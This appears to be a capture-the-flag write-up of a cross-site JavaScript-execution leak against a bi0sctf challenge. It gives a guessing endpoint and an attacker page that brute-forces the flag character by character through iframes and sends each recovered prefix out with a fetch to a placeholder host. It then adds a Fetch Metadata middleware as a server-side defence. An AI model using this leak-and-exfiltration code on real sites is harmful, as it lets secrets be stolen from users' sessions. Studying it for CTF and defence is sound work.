JavaScript Execution XS Leak
```javascript
// Code that will try ${guess} as flag (needs the rest of the server code)
app.get("/guessing", function (req, res) {
  let guess = req.query.guess
  let page = `<html>
    <script>
      function foo() {
        // If not the flag this will be executed
        window.parent.foo()
      }
    </script>
    <script src="${guess}&hint=foo()"></script>
  </html>`
  res.send(page)
})
```
Main page that generates iframes to the previous `/guessing` page to test each possibility:
```html
<html>
  <script>
    let candidateIsGood = false
    let candidate = ""
    let flag = "bi0sctf{"
    let guessIndex = -1
    let flagChars = "<alphabet-goes-here>"

    // this will get called from our iframe IF the candidate is WRONG
    function foo() {
      candidateIsGood = false
    }

    let timerId = setInterval(() => {
      if (candidateIsGood) {
        flag = candidate
        guessIndex = -1
        fetch("<yours-goes-here>?flag=" + flag)
      }

      // Start with true; it is changed to false if the guess is wrong
      candidateIsGood = true
      guessIndex++
      if (guessIndex >= flagChars.length) {
        return
      }
      let guess = flagChars[guessIndex]
      candidate = flag + guess
      let iframe = `<iframe src="/guessing?guess=${encodeURIComponent(candidate)}"></iframe>`
      console.log("iframe: ", iframe)
      hack.innerHTML = iframe
    }, 500)
  </script>
  <div id="hack"></div>
</html>
```
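A server-side mitigation for the cross-site `<script src>` inclusion used above, as an added example that is not part of the original page: a Fetch Metadata resource isolation check for the endpoint being probed. The function names are hypothetical, the middleware assumes Express's `(req, res, next)` convention, and the sample header sets are constructed.

```javascript
// Added example (not from the original page): Fetch Metadata resource
// isolation for the endpoint that is being included via <script src>.
// Function names are hypothetical; the middleware follows Express's
// (req, res, next) convention.

function isAllowedByFetchMetadata(method, headers) {
  const site = headers["sec-fetch-site"]
  // Browsers without Fetch Metadata send no header: rely on other defenses.
  if (site === undefined) return true
  // Same-origin, same-site and user-initiated (address bar) requests.
  if (["same-origin", "same-site", "none"].includes(site)) return true
  // Cross-site: allow only plain top-level GET navigations (links), never
  // subresource loads such as <script>, <img> or embedded frames.
  return (
    method === "GET" &&
    headers["sec-fetch-mode"] === "navigate" &&
    headers["sec-fetch-dest"] === "document"
  )
}

function fetchMetadataGuard(req, res, next) {
  if (isAllowedByFetchMetadata(req.method, req.headers)) return next()
  // Same empty 403 for every blocked request, whatever the query was.
  res.statusCode = 403
  res.end()
}

// Constructed sample requests (header names lower-cased, as Node delivers them).
const crossSiteScript = {
  "sec-fetch-site": "cross-site",
  "sec-fetch-mode": "no-cors",
  "sec-fetch-dest": "script",
}
const sameOriginFetch = {
  "sec-fetch-site": "same-origin",
  "sec-fetch-mode": "cors",
  "sec-fetch-dest": "empty",
}
const crossSiteLink = {
  "sec-fetch-site": "cross-site",
  "sec-fetch-mode": "navigate",
  "sec-fetch-dest": "document",
}
```

Mount the guard ahead of the sensitive routes, for example with `app.use(fetchMetadataGuard)`.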